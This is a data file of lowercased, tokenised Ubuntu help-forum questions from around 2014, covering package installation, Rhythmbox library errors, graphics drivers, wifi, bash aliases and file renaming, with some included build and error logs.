481792	regarding facebook messages and pidgin	this question seems to be kind of difficult to explain , so i have n't been able to find the answers anywhere for lack of search terms that i can think of . and maybe most people do n't consider it a problem anyway . but when i 'm on facebook , and i have something like pidgin connected for my messages , i still ca n't be scrolling down my facebook news feed without having message boxes popping up in front of what i 'm doing . how can i make message notifications only go to the app i 'm using for receiving them ? it gets incredibly annoying , and kind of defeats the purpose of having these applications in the first place if facebook is still going to personally nag me about my messages . i can go into chat and `` turn of chat '' , but i still get a little red message icon when something new comes through , in the top right ( and in this case , i believe my friends see me as appearing offline , even though i 'm responding to them ) . perhaps you do n't consider this much of a problem , but i consider it a deep enough annoyance to not make it worth using these programs . does anybody know any good way to make facebook just let pidgin handle my messages ? perhaps a browser extension that removes the messaging capabilities from the browser version of facebook or something ? thanks .
481795	default permissions wrong for backup and other programms	i ran my first backup with ubuntu 14.04 which ended ok but reported a bunch of files that failed : these are all the ones in /home/me/.launchpadlib/api.launchpad.net/cache which are more recent than oct 9 , 2013 surely because they are owned by root : root instead of me : me for the previous ones . i know i can exclude the whole folder from backup , but please tell me if i should safely get ownership over these files . the cache folder is owned by me : me and permissions are 700 . then is it a good idea to exclude this folder from backup ? maybe i did something wrong thank you
481801	unity can not load with intel card after an update	i know there is a bunch of similar questions out there , but none of them helpful for me so i created my own . after some updates unity can not load with intel vga . it 's an optimus configuration with an intel hd3000 . i already tried these steps to repair : first of all i usually use xorg-edgers ppa , so i purged and removed it and the related packages and installed the official stuff . after that i reinstalled xserver-xorg-core & unity & lightdm . purged and reinstalled nvidia-prime . after the third step unity loads because nvidia set itself to default vga so i figured out this problem is related only with the intel vga . when i try to switch to intel unity fails and i only see the desktop background . i changed to command line and it wrote the following : and here 's my xorg.2.log does anybody have an idea what occur this ?
481803	how to add cropping preset in shotwell	would it be possible to add a preset to the cropping proportions list in shotwell viewer ? if so , how ?
481805	what kind of traffic is going to ec2-54-83-181-212.compute ?	i 'm toying with some tools to monitor the network traffic going to and from my laptop . specifically , i 'm using iftop and nethogs . i am constantly seing traffic with a site reported as ec2-54-83-181-212.compute by iftop , even when no specific application is running , and i 'm wondering what this is . i suspect it could be a cloud instance of some sort , maybe even a ubuntu server ( for unity lenses maybe ) , but i 'm not sure how to check this . any tip ?
481807	how to install g++ in ubuntu 14.04 ?	i have recently installed ubuntu 14.04 in virtual box . now i want to install g++ 4.7 in it . i am trying this command in terminal but its not working . sudo apt-get install g++-4.7 reading package list ... done building dependency tree reading state information ... done e : unable to locate package g++-4.7 e : could n't find any package by regex 'g++-4.7' but i find gcc was there with ubuntu 14.04 installation itself . how could i install g++ in ubuntu 14.04 and any version of g++ abouve 4.7.2 is fine with me .
481809	rhythmbox will not start	i have recently uninstalled rhythmbox on my ubuntu 14.04 laptop , through the ubuntu software center and , because it still appeared under the sound icon , i ran the command sudo apt-get purge rhythmbox in terminal . in case you are wondering why , rhythmbox was failing to start on a regular basis , so i foolishly thought that a simple reinstall would make life better ! next i installed rhythmbox again through the ubuntu software center now , when i click the icon to run it , nothing happens and when i enter the command rhythmbox in terminal , i receive the following error . $ rhythmbox rhythmbox : error while loading shared libraries : libtotem-plparser.so.17 : can not open shared object file : no such file or directory how do i reinstall the shared libraries libtotem-plparser.so.17 or access/re-create the necessary shared object file ? i have tried : the fix on missing shared library for rhythmbox changing the librhythmbox-core7 to librhythmbox-core8 : sudo apt-get -- reinstall install gir1.2-rb-3.0 librhythmbox-core8 rhythmbox rhythmbox-data rhythmbox-mozilla rhythmbox-plugin-cdrecorder rhythmbox-plugin-zeitgeist rhythmbox-plugins i also tried the fix on rhythmbox does not start after upgrading to ubuntu 14.04 but still get the same error message in both cases : $ rhythmbox rhythmbox : error while loading shared libraries : libtotem-plparser.so.17 : can not open shared object file : no such file or directory update 1 suggested by jobin $ ls -l /usr/lib/libtotem-plparser.so.18 : lrwxrwxrwx 1 root root 27 apr 1 14:32 /usr/lib/libtotem-plparser.so.18 - > libtotem-plparser.so.18.1.0 update 2 i have tried downloading and reinstalling rhythmbox 3 : simon @ simon-ts44hr : ~/downloads/rhythmbox-3.0.2 $ ./configure checking for a bsd-compatible install ... /usr/bin/install -c checking whether build environment is sane ... yes checking for a thread-safe mkdir -p ... /bin/mkdir -p checking for gawk ... no checking for mawk ... mawk checking whether make sets $ ( make ) ... yes checking whether make supports nested variables ... yes checking whether uid '1000 ' is supported by ustar format ... yes checking whether gid '1000 ' is supported by ustar format ... yes checking how to create a ustar tar archive ... gnutar checking whether to enable maintainer-specific portions of makefiles ... yes checking whether make supports nested variables ... ( cached ) yes checking for pkg-config ... /usr/bin/pkg-config checking pkg-config is at least version 0.9.0 ... yes checking for gobject-introspection ... yes checking whether nls is requested ... yes checking for style of include used by make ... gnu checking for gcc ... gcc checking whether the c compiler works ... yes checking for c compiler default output file name ... a.out checking for suffix of executables ... checking whether we are cross compiling ... no checking for suffix of object files ... o checking whether we are using the gnu c compiler ... yes checking whether gcc accepts -g ... yes checking for gcc option to accept iso c89 ... none needed checking dependency style of gcc ... gcc3 checking for intltool > = 0.35.0 ... 0.50.2 found checking for intltool-update ... /usr/bin/intltool-update checking for intltool-merge ... /usr/bin/intltool-merge checking for intltool-extract ... /usr/bin/intltool-extract checking for xgettext ... /usr/bin/xgettext checking for msgmerge ... /usr/bin/msgmerge checking for msgfmt ... /usr/bin/msgfmt checking for gmsgfmt ... /usr/bin/msgfmt checking for perl ... /usr/bin/perl checking for perl > = 5.8.1 ... 5.18.2 checking for xml : :parser ... ok checking for library containing strerror ... none required checking for gcc ... ( cached ) gcc checking whether we are using the gnu c compiler ... ( cached ) yes checking whether gcc accepts -g ... ( cached ) yes checking for gcc option to accept iso c89 ... ( cached ) none needed checking dependency style of gcc ... ( cached ) gcc3 checking how to run the c preprocessor ... gcc -e checking for grep that handles long lines and -e ... /bin/grep checking for egrep ... /bin/grep -e checking for ansi c header files ... yes checking build system type ... x86_64-unknown-linux-gnu checking host system type ... x86_64-unknown-linux-gnu checking how to print strings ... printf checking for a sed that does not truncate output ... /bin/sed checking for fgrep ... /bin/grep -f checking for ld used by gcc ... /usr/bin/ld checking if the linker ( /usr/bin/ld ) is gnu ld ... yes checking for bsd- or ms-compatible name lister ( nm ) ... /usr/bin/nm -b checking the name lister ( /usr/bin/nm -b ) interface ... bsd nm checking whether ln -s works ... yes checking the maximum length of command line arguments ... 1572864 checking whether the shell understands some xsi constructs ... yes checking whether the shell understands `` += '' ... yes checking how to convert x86_64-unknown-linux-gnu file names to x86_64-unknown-linux-gnu format ... func_convert_file_noop checking how to convert x86_64-unknown-linux-gnu file names to toolchain format ... func_convert_file_noop checking for /usr/bin/ld option to reload object files ... -r checking for objdump ... objdump checking how to recognize dependent libraries ... pass_all checking for dlltool ... no checking how to associate runtime and link libraries ... printf % s\n checking for ar ... ar checking for archiver @ file support ... @ checking for strip ... strip checking for ranlib ... ranlib checking command to parse /usr/bin/nm -b output from gcc object ... ok checking for sysroot ... no checking for mt ... mt checking if mt is a manifest tool ... no checking for sys/types.h ... yes checking for sys/stat.h ... yes checking for stdlib.h ... yes checking for string.h ... yes checking for memory.h ... yes checking for strings.h ... yes checking for inttypes.h ... yes checking for stdint.h ... yes checking for unistd.h ... yes checking for dlfcn.h ... yes checking for objdir ... .libs checking if gcc supports -fno-rtti -fno-exceptions ... no checking for gcc option to produce pic ... -fpic -dpic checking if gcc pic flag -fpic -dpic works ... yes checking if gcc static flag -static works ... yes checking if gcc supports -c -o file.o ... yes checking if gcc supports -c -o file.o ... ( cached ) yes checking whether the gcc linker ( /usr/bin/ld -m elf_x86_64 ) supports shared libraries ... yes checking whether -lc should be explicitly linked in ... no checking dynamic linker characteristics ... gnu/linux ld.so checking how to hardcode library paths into programs ... immediate checking whether stripping libraries is possible ... yes checking if libtool supports shared libraries ... yes checking whether to build shared libraries ... yes checking whether to build static libraries ... no configure : creating ./config.lt config.lt : creating libtool checking whether byte ordering is bigendian ... no checking size of long ... 8 checking for pkg-config ... ( cached ) /usr/bin/pkg-config checking pkg-config is at least version 0.16 ... yes checking for gnu extension fwrite_unlocked ... yes checking for pkg-config ... ( cached ) /usr/bin/pkg-config checking pkg-config is at least version 0.9.0 ... yes checking for rb_client ... yes checking for rhythmbox ... yes checking for totem_plparser ... yes checking for gudev ... yes checking for hal ... no checking for ipod ... yes checking for mtp ... yes checking for libsecret ... yes checking for gstreamer ... yes checking for notify ... yes your libnotify version is 0,7,6. checking for uncompress in -lz ... yes checking for x ... libraries , headers checking for gethostbyname ... yes checking for connect ... yes checking for remove ... yes checking for shmat ... yes checking for iceconnectionnumber in -lice ... yes checking for xfree86 headers ... yes checking for libbrasero_media ... yes checking for glib-genmarshal ... /usr/bin/glib-genmarshal checking for gdk-pixbuf-csource ... /usr/bin/gdk-pixbuf-csource checking whether strftime supports % e and % o modifiers ... yes checking for msgfmt ... ( cached ) /usr/bin/msgfmt checking for gmsgfmt ... ( cached ) /usr/bin/msgfmt checking for xgettext ... ( cached ) /usr/bin/xgettext checking for msgmerge ... ( cached ) /usr/bin/msgmerge checking for ld used by gcc ... /usr/bin/ld -m elf_x86_64 checking if the linker ( /usr/bin/ld -m elf_x86_64 ) is gnu ld ... yes checking for shared library run path origin ... done checking for cfpreferencescopyappvalue ... no checking for cflocalecopycurrent ... no checking for gnu gettext in libc ... yes checking whether to use nls ... yes checking where the gettext function comes from ... libc checking lirc/lirc_client.h usability ... yes checking lirc/lirc_client.h presence ... yes checking for lirc/lirc_client.h ... yes checking for lirc_init in -llirc_client ... yes checking for webkit ... yes checking for more warnings ... no checking whether gcc understands -fno-strict-aliasing ... yes checking for gtk-doc ... yes checking for gtkdoc-check ... gtkdoc-check.test checking for gtkdoc-check ... /usr/bin/gtkdoc-check checking for gtkdoc-rebase ... /usr/bin/gtkdoc-rebase checking for gtkdoc-mkpdf ... /usr/bin/gtkdoc-mkpdf checking whether to build gtk-doc documentation ... no checking for gtkdoc_deps ... yes checking for itstool ... itstool checking for xmllint ... xmllint checking for a python interpreter with version > = 3.2.3 ... python3 checking for python3 ... /usr/bin/python3 checking for python3 version ... 3.4 checking for python3 platform ... linux checking for python3 script directory ... $ { prefix } /lib/python3.4/site-packages checking for python3 extension module directory ... $ { exec_prefix } /lib/python3.4/site-packages checking for python ... yes checking whether vala plugin support is requested ... autodetect checking whether fm radio support is requested ... checking linux/videodev2.h usability ... yes checking linux/videodev2.h presence ... yes checking for linux/videodev2.h ... yes checking for check ... no checking for dmapsharing ... yes checking for clutter ... yes checking for grilo ... no checking that generated files are newer than configure ... done configure : creating ./config.status config.status : creating rhythmbox.pc config.status : creating makefile config.status : creating lib/makefile config.status : creating lib/libmediaplayerid/makefile config.status : creating metadata/makefile config.status : creating rhythmdb/makefile config.status : creating widgets/makefile config.status : creating podcast/makefile config.status : creating shell/makefile config.status : creating data/makefile config.status : creating data/rhythmbox.desktop.in config.status : creating data/rhythmbox-device.desktop.in config.status : creating data/ui/makefile config.status : creating data/icons/makefile config.status : creating data/icons/hicolor/makefile config.status : creating data/icons/hicolor/16x16/makefile config.status : creating data/icons/hicolor/16x16/apps/makefile config.status : creating data/icons/hicolor/16x16/status/makefile config.status : creating data/icons/hicolor/22x22/makefile config.status : creating data/icons/hicolor/22x22/apps/makefile config.status : creating data/icons/hicolor/24x24/makefile config.status : creating data/icons/hicolor/24x24/apps/makefile config.status : creating data/icons/hicolor/32x32/makefile config.status : creating data/icons/hicolor/32x32/apps/makefile config.status : creating data/icons/hicolor/48x48/makefile config.status : creating data/icons/hicolor/48x48/apps/makefile config.status : creating data/icons/hicolor/48x48/status/makefile config.status : creating data/icons/hicolor/256x256/makefile config.status : creating data/icons/hicolor/256x256/apps/makefile config.status : creating data/icons/hicolor/scalable/makefile config.status : creating data/icons/hicolor/scalable/apps/makefile config.status : creating data/icons/src/makefile config.status : creating sources/makefile config.status : creating sources/sync/makefile config.status : creating plugins/makefile config.status : creating plugins/audiocd/makefile config.status : creating plugins/audioscrobbler/makefile config.status : creating plugins/brasero-disc-recorder/makefile config.status : creating plugins/daap/makefile config.status : creating plugins/fmradio/makefile config.status : creating plugins/im-status/makefile config.status : creating plugins/ipod/makefile config.status : creating plugins/mtpdevice/makefile config.status : creating plugins/iradio/makefile config.status : creating plugins/lirc/makefile config.status : creating plugins/lyrics/makefile config.status : creating plugins/pythonconsole/makefile config.status : creating plugins/artsearch/makefile config.status : creating plugins/magnatune/makefile config.status : creating plugins/generic-player/makefile config.status : creating plugins/rb/makefile config.status : creating plugins/rb/rbconfig.py config.status : creating plugins/power-manager/makefile config.status : creating plugins/mmkeys/makefile config.status : creating plugins/context/makefile config.status : creating plugins/sendto/makefile config.status : creating plugins/replaygain/makefile config.status : creating plugins/mpris/makefile config.status : creating plugins/dbus-media-server/makefile config.status : creating plugins/rbzeitgeist/makefile config.status : creating plugins/notification/makefile config.status : creating plugins/visualizer/makefile config.status : creating plugins/grilo/makefile config.status : creating sample-plugins/makefile config.status : creating sample-plugins/sample/makefile config.status : creating sample-plugins/sample-python/makefile config.status : creating sample-plugins/sample-vala/makefile config.status : creating bindings/makefile config.status : creating bindings/vala/makefile config.status : creating bindings/gi/makefile config.status : creating help/makefile config.status : creating po/makefile.in config.status : creating tests/makefile config.status : creating doc/makefile config.status : creating doc/reference/makefile config.status : creating backends/makefile config.status : creating backends/gstreamer/makefile config.status : creating remote/makefile config.status : creating remote/dbus/makefile config.status : creating config.h config.status : executing depfiles commands config.status : executing libtool commands config.status : executing po-directories commands config.status : creating po/potfiles config.status : creating po/makefile config.status : executing po/stamp-it commands configure : rhythmbox was configured with the following options : configure : ** tree database is enabled configure : ** multimedia keys support is enabled configure : ** ipod integration enabled configure : ** mtp integration enabled configure : ** cd burning support enabled configure : ** daap ( music sharing ) support is enabled configure : ** libnotify support is enabled configure : ** webkit support is enabled configure : ** gudev support enabled configure : ** python plugin support enabled configure : vala plugin support disabled configure : ** libsecret keyring support enabled configure : ** fm radio support enabled configure : ** itunes detection browser plugin ( for podcasts ) enabled configure : ** visualizer plugin enabled configure : end options when i make the file it runs well until : file `` /usr/lib/gobject-introspection/giscanner/cachestore.py '' , line 148 , in _clean self._remove_filename ( os.path.join ( self._directory , filename ) ) file `` /usr/lib/gobject-introspection/giscanner/cachestore.py '' , line 130 , in _remove_filename os.unlink ( filename ) oserror : [ errno 13 ] permission denied : '/home/simon/.cache/g-ir-scanner/c3fdfb2eef221c4c5ec8d16026d3ec132ad90e39' make [ 3 ] : *** [ mpid-3.0.gir ] error 1 make [ 3 ] : leaving directory `/home/simon/downloads/rhythmbox-3.0.2/bindings/gi' make [ 2 ] : *** [ all-recursive ] error 1 make [ 2 ] : leaving directory `/home/simon/downloads/rhythmbox-3.0.2/bindings' make [ 1 ] : *** [ all-recursive ] error 1 make [ 1 ] : leaving directory `/home/simon/downloads/rhythmbox-3.0.2' make : *** [ all ] error 2 then running rhythmbox from the terminal gives : simon @ simon-ts44hr : ~/downloads/rhythmbox-3.0.2 $ rhythmbox rhythmbox : error while loading shared libraries : libtotem-plparser.so.17 : can not open shared object file : no such file or directory' update 3 from dobey $ apt-cache policy rhythmbox rhythmbox : installed : 3.0.2-0ubuntu2 candidate : 3.0.2-0ubuntu2 version table : *** 3.0.2-0ubuntu2 0 500 http : //gb.archive.ubuntu.com/ubuntu/ trusty-updates/main amd64 packages 100 /var/lib/dpkg/status 3.0.2-0ubuntu1 0 500 http : //gb.archive.ubuntu.com/ubuntu/ trusty/main amd64 packages update 4 by sneetsher after running sudo dpkg -i libtotem-plparser17_3.4.5-1_amd64.deb in terminal $ rhythmbox ( rhythmbox:4104 ) : glib-gio-critical ** : g_settings_new_with_path : assertion 'path_is_valid ( path ) ' failed ( rhythmbox:4104 ) : glib-gio-critical ** : g_settings_new_with_path : assertion 'path_is_valid ( path ) ' failed ( rhythmbox:4104 ) : glib-gobject-warning ** : invalid ( null ) pointer instance ( rhythmbox:4104 ) : glib-gobject-critical ** : g_signal_connect_object : assertion 'g_type_check_instance ( instance ) ' failed ( rhythmbox:4104 ) : glib-gio-critical ** : g_settings_get_value : assertion 'g_is_settings ( settings ) ' failed ( rhythmbox:4104 ) : glib-critical ** : g_variant_get_type : assertion 'value ! = null ' failed ( rhythmbox:4104 ) : glib-critical ** : g_variant_type_is_subtype_of : assertion 'g_variant_type_check ( type ) ' failed ( rhythmbox:4104 ) : glib-critical ** : g_variant_get_boolean : assertion 'g_variant_is_of_type ( value , g_variant_type_boolean ) ' failed ( rhythmbox:4104 ) : glib-critical ** : g_variant_unref : assertion 'value ! = null ' failed ( rhythmbox:4104 ) : glib-gobject-warning ** : invalid ( null ) pointer instance ( rhythmbox:4104 ) : glib-gobject-critical ** : g_signal_connect_object : assertion 'g_type_check_instance ( instance ) ' failed ( rhythmbox:4104 ) : glib-gio-critical ** : g_settings_get_value : assertion 'g_is_settings ( settings ) ' failed ( rhythmbox:4104 ) : glib-critical ** : g_variant_get_type : assertion 'value ! = null ' failed ( rhythmbox:4104 ) : glib-critical ** : g_variant_type_is_subtype_of : assertion 'g_variant_type_check ( type ) ' failed ( rhythmbox:4104 ) : glib-critical ** : g_variant_get_boolean : assertion 'g_variant_is_of_type ( value , g_variant_type_boolean ) ' failed ( rhythmbox:4104 ) : glib-critical ** : g_variant_unref : assertion 'value ! = null ' failed ( rhythmbox:4104 ) : rhythmbox-warning ** : could not open device /dev/radio0
481812	space does not work in vnc mode	i 'm accessing my computer via vnc using the tightvnc server and mac os x screen sharing application as a client , but for some reason the 'space ' key does not work at all . all the other keyboard keys work though . how can i fix this ?
481813	how to update pgp key on key servers	email i used in my pgp key has changed . what should i do to update the key with my new email . ( apart from uploading second key ) .
481815	apparmor= '' denied ''	i get loads of error messages like this in dmesg [ 613107.890167 ] type=1400 audit ( 1402488663.041:108 ) : apparmor= '' denied '' operation= '' exec '' profile= '' /usr/bin/evince-thumbnailer//sanitized_helper '' name= '' /usr/share/texlive/texmf-dist/web2c/mktexnam '' pid=9841 comm= '' mktexpk '' requested_mask= '' x '' denied_mask= '' x '' fsuid=1000 ouid=0 it seems this is some problem with my latex install . does anyone know how to fix it ?
481816	why my 'at ' clause command execute the shell immediately and ignored the time limit ?	i wrote a shell named t.sh it 's content is : touch 88888 the command i 'm using is sh t.sh | at 03:13jun15 after i execute this command , i got this show on my screen : warning : commands will be executed using /bin/sh job 9 at sun jun 15 03:13:00 2014 it shows quite clear that this will be executed at sun jun 15 03:13:00 2014 but when i check my folder , and i find a 88888 file exists there . rmoved it and try agian , still the same result . what 's the problems here ? would it be a bash/sh thing ? because i saw it says will execute by /bin/sh ?
481824	oracle-xe 11g installation on ubuntu 14.04	i tried to install the oracle-xe 11g rpm package . i tried to follow the oracle pdf provided by the oracle site . i run : rpm -ivh oracle-xe-11.2.0-1.0.x86_64.rpm and i get the following : glibc > = 2.3.4 is needed by oracle-xe-11.2.0-1.0.x86_64 libaio > = 0.3.104 is needed by oracle-xe-11.2.0-1.0.x86_64 /bin/sh is needed by oracle-xe-11.2.0-1.0.x86_64 i can not seem to update or install these . please help .
481825	create a context menu item : take ownership of files/folders	i want this command : sudo chown $ user -r ./ to appear in my nautilus context menu , so that i can quickly take ownership of files . is this possible , since this is a sudo command ? if so , how ?
481829	command not found for alias	i recently installed the apache2 package using the software centre , i want to create an alias apacheres which will replace the more cumbersome command /etc/init.d/apache2 restart . i opened the .bashrc file in my home directory , and it contains the following lines : # alias definitions . # you may want to put all your additions into a separate file like # ~/.bash_aliases , instead of adding them here directly . # see /usr/share/doc/bash-doc/examples in the bash-doc package . if [ -f ~/.bash_aliases ] ; then . ~/.bash_aliases fi so i created a .bash_aliases file in my home directory , and added only this line : alias apacheres ='/etc/init.d/apache2 restart' when i started my terminal , i get this error message : bash : alias : apacheres : not found bash : alias : =/etc/init.d/apache2 restart : not found the shell has obviously read the file , otherwise it would n't know of its existence . i have checked the directory path and i can find the file apache2 there . what do i need to do to make this alias work ?
481833	inspite of set network-mode 3g type , getting 2g connection with mobile broadband	i have set 3g type at mobile-broadband setting : but i still getting 2g ( edge ) type very-slow connection : also 3g network available as following : how to solve this and get only 3g ( hspa/wcdma ) instead of edge connection ? ( because there is bsnl-3g available in my area and work correctly on android-phone & windows ) i 've tried after replugging and restarting but not solved .
481835	trackball w/ 4 buttons : how to remap one of buttons to double click ?	i 've got kensington slimblade trackball which i 've used at my workplace on windows for past several years . today it moved to my house and i 'm curious if i 'm able to configure mouse buttons with something . xev told me that mouse buttons that are pressed when i click on different buttons are : 1 . button 1 , button 2 - standard left/right mouse button 2 . button 3 - this works as standard middle mouse button 3 . button 8 - which works strange somehow . what i want to achieve is to have button 8 interpreted as double mouse-click . is this possible somehow ? if it 's important , i 'm running kde .
481837	how do i disable root login ?	i wanted to try the root login ( gui mode ) but i am a bit scared that i might mess up something so i want to disable it . how do i do it ?
481838	black screen after grub menu with a underscore	recently after trying to upgrade ubuntu 13.10 to ubuntu 14.04 my laptop will boot up until the grub menu and after selecting my os it would just give me a black screen with a underscore at the top the problem seems to have something to do with the graphic drivers from what i 've been able to find . computer model : dell inspiron 1564 processor : intel core i3 system chipset : intel hm55
481840	removing specific part of filename ( what 's after the second dash ) for all files in a folder	i use the command line utility youtube-dl to download videos from youtube and make mp3s from them with avconv . i 'm doing this under ubuntu 14.04 and very happy with it . the utility downloads the files and saves them with the following name scheme : title ( artist-track ) -id.mp3 so an actual filename looks like : epic rap battle of manliness-_ezdrpkfao4.mp3 some other file names in the folder look like : epic rap battle of manliness-_ezdrpkfao4.mp3 martin garrix - animals ( official video ) -gcychz2k5x0.mp3 stromae - papaoutai-oikj0z_xnjc.mp3 at first , this was no problem . it did n't bother me while listening to my music in rhytmbox . but when moving to phone or other devices it is pretty confusing to see a so long name , and some players , like the samsung ones , treat that last part ( id after second dash ) of the name as album or something . i 'd like to create a bash script that removes what 's after the second dash in the name for all files , so it 'll make them like this : from : martin garrix - animals ( official video ) -gcychz2k5x0.mp3 to : martin garrix - animals ( official video ) .mp3 is it also possible to instruct youtube-dl to exclude the id from now on ? i am currently downloading with the command : youtube-dl -- extract-audio -- audio-quality 0 -- audio-format mp3 url
481846	will removing nvidia drivers cause any harm ?	i have a nvidia geforce gt 630m ( optimus ) graphics card . at this point i just want to disable it , but have a laptop that does n't give the option in the bios . will deleting the nvidia drivers ( nvidia-304 , nvidia-settings , nvidia-xconfig , etc ) cause any harm ?
481847	prevent .zargo files to be opened as compressed files	i installed argo uml ( http : //argouml.tigris.org/ ) on my pc with ubuntu 14 . 04 . it 's located in /opt/argouml . i 've made a symbolic link to /usr/bin/argouml for /opt/argouml/argouml.sh . also i 've created a desktop file in /usr/share/applications [ desktop entry ] name=argo uml genericname=uml editor icon=/usr/argouml/icon/argouml.svg type=application categories=development ; exec=argouml % f startupnotify=false terminal=false argo uml creates .zargo files for storing diagrams on file system . ubuntu considers this file as zip archive and opens with archive manager . i tried to change the default application , and than it opens with argo uml not only zargo files , but also zip archives . so i restored the default state .
481853	trouble connecting to wifi network with ubuntu 14.04	good morning , i work for a school board in montreal and we are introducing ubuntu and it 's derivatives as a solution to give our older technology new life . we have mostly used ubuntu and edubuntu 12.04.4 lts and it works great . when we try to use a more recent version such as 14.04 we are not able to connect to our wireless network . for security we use wpa2 enterprise , peap authentication , peap version automatic , inner authentication , mschapv2 , . i do n't understand why we would get a connection using the exact same configuration with version 12.04.4 and it does not work with 14.04 . we have noticed the same thing when trying lubuntu 14.04 and xubuntu 14.04 . any help would be greatly appreciated
481856	get keyboard scancodes in ubuntu 13.10	i 'm trying to find out the scancodes for a set of foot pedals so that i can rebind them to more useful keys . in older versions of ubuntu i was able to do this using /lib/udev/keymap as discussed here , but the program seems to no longer exist ! luckily i still know what the scancodes are for my specific hardware so i can still get everything working , but i want to write a post about how to set up foot pedals . the arch-linux wiki suggests using showkey -- scancodes but that seems to give me the wrong numbers ( by comparing with the known , working scancodes that i 'm currently using in my /etc/udev/hwdb.d/90-custom-keyboard.hwdb file ) : hex decimal scancode used in config 0x70004 458756 showkey -s output 0x5d 91 xev keycode 191 since it 's similar to the x keycode i guess that x11 is interfering somewhere . is there an alternative way of finding the scancodes ? preferably one that does n't involve using virtual consoles . ( this is a repost of a question i posted on superuser that no one was able to answer , i hope that 's ok . )
481858	is there a an irc unity webapp available ?	i was wondering if there is an irc unity webapp available ?
481859	brother mfc-j470dw scan function `` check connection ''	i have a brother mfc-j470dw printer that i have connected to a linux desktop ( running ubuntu 14.04 ) using a wireless router network . the printer works fine for printing and copying , but now i want to add the scan function . to set up the scan function , i went to the brother web page for this printer : http : //support.brother.com/g/b/downloadlist.aspx ? c=eu_ot & lang=en & prod=mfcj470dw_us_eu_as & os=128 and under scanner drivers selected `` scanner driver 64bit ( deb package ) '' , `` scan-key-tool 64bit ( deb package ) '' , and '' scanner setting file ( deb package ) '' . for each package , i clicked the eula , and selected `` open with ubuntu software center '' . then after the usc window pops up , i click on install and the red line goes from left to right . in each case , the usc window then had a green checkmark and the install box changes to reinstall ( that 's how you know it worked ) . so now i try it out . hitting the scan button on the printer , selecting `` scan to file '' , and hitting ok produces the message `` check connection '' . i checked the brother linux information faq ( scanner ) page and the 14th question seems the same as mine : when i try to use the scan key on my network connected machine , i receive the error `` check connection '' or i can not select anything except `` scan to ftp '' . i explored the solution given for this faq , but found from ifconfig that i am already using eth0 , the default setting , so presumably that is not the problem . i also found brscan-skey installed in /usr/bin and did drrm @ drrmlinux2 : ~ $ brscan-skey -t drrm @ drrmlinux2 : ~ $ brscan-skey but that did n't help - i still get the `` check connection '' message . what can you suggest to fix this problem ?
481861	ubuntu theme went off after the reboot/turn off , how do i put it back ?	i 'm trying top use the moka theme in ubuntu 14.04 x64 , but even with unity twaek tool , nothing changes . the theme is always on ambiance , and so the icons in the launchbar and the mouse arrow . unfortunately , icons are applied in control panel only . how can i fix it ?
481869	ubuntu 14.04lts flickering	when i start the computer , makes a big high pitch sound and the only thing i can see on the screen is [ [ 23 written everywhere . in order to use ubuntu i have to run it in recovery mode . the ubuntu desktop screen does not flicker , but every window that can maximmize and minimize does it like crazy . like firefox browser , terminal , vlc.. i have an acer aspire one laptop with amd/ati graphic card . i read many forums about flickering screen and i try many things , but i still have the problem . i am very new in ubuntu , so please use terms/instructions that are easy to understand .
481872	disabling sticky edges for multiple users at one time	i am trying to disable sticky edges for multiple users across multiple machines . currently i am using the following code in a script i use for setting up a new machine . dconf write /org/compiz/profiles/unity/plugins/unityshell/launcher-capture-mouse false but it only affects the user who ran the script . could anyhow help me do this more efficiently ? thank you .
481876	resized ubuntu 14.04 partition will not boot	first , a little background info : i intended to install ubuntu alongside os x , but i accidentally erased my entire hard drive and was left with ubuntu alone . yesterday , i finally tried to create a desperate partition and os x. i successfully shrank my ubuntu partition and created ~40 gb of free space . i used gparted to do this . at first i tried to use internet recovery to install os x on the unallocated space i had created , but discovered i could n't . i went back to gparted and created a fat partition with that space . i 'm pretty sure i actually did this using my ubuntu partition on my hard drive ( the one i had just shrunken ) , rather than the usb live boot i had used to shrink it . therefore , at this point , i think my ubuntu partition was still functioning properly . i went back to internet recovery and used disk utility to turn the fat partition into a mac os extended ( journaled ) [ hfs/hfs+ ] partition . i believe this is probably where the problem occurred . i successfully reinstalled os x and found it to be fully functioning . however , when i tried to boot back into the ubuntu partition all i got was a black screen with a little white cursor ( it looks similar to a terminal screen/the mac dfu mode , but i ca n't type anything into it . is there anything i can do to repair my ubuntu partition ? if not , can i at least recover the data from it ? thank you for any help .
481880	overclocking graphics card ?	i have a intel® iris™ pro graphics 5200 on ubuntu14.04 ( 64 bit ) . is there any kind of way i can overclock the card successfully and if so how to do so ?
481881	nautilus ( semi- ) randomly quitting	a few days ago i upgraded windows xp to ubuntu 14.04 64-bit . i had troubles with my graphical driver , so i downloaded the official nvidia driver . everything seemed flawless , except for when i had two applications maximized and i maximized another application . then it always crashed . a few minutes ago , i was just doing stuff afk ( away from keyboard ) and nautilus crashed again . i only had mozilla firefox open and nothing else . the problem seems very weird . does anybody have a solution ?
481885	gui wo n't load , but the desktop background loads . ca n't access the terminal	having trouble with the ubuntu gui . i can log in just fine ( see this ) ... everything looks normal there . but as soon as i put in my password , i get this . i tried a few different troubleshooting keyboard commands ( ctrl+alt+t , crtl+alt+delete ) , and only the latter worked . i can interact with that window just fine , except i am unable to resize or move it . the first time i logged in , i got a dialog box that said , `` ubuntu has experienced an internal error . send error report ? '' does n't say anything now . yes i tried restarting it . thanks a bunch , michael edit : trying to start a guest session leads to the same problem .
481888	archive manager will not load when starting a usb installer so i can install ubuntu 14.04 32 bit	i am a beginner to linux . i 'd accidentally installed ubuntu-14.04-desktop-amd64.iso instead of ubuntu-14.04-desktop-i386.iso , on my netbook ( hp mini 110-3100 with a intel® atom™ cpu n455 @ 1.66ghz × 2 processor ) . i am attempting to install ubuntu 32 bit through a usb installer but the system states `` an error occurred while loading archive '' . i 've tried to solved the issue through system updates to no avail , and even attempted through the `` terminal '' but my knowledge of appropriate `` apt-get '' and other commands are limited for now . i would really appreciate your assistance .
481891	keep getting added to hosts.deny + iptables	i am confused to why this has started to happen . on my local network , if i click 10-20 apache/http links my server will decide to add me hosts.deny file and block me on iptables . its not just apache , it seems to happen with any kinda of traffic , that comes in on a flood method . like i use subsonic , if i change tracks 10-20 times , it will do it . i would assume i have some sort of firewall which is sitting on the server which is doing this . however i do not have fail2ban or any denyhosts in /var/lib . i can not work out why i keep getting added to hosts.deny/iptables . thanks
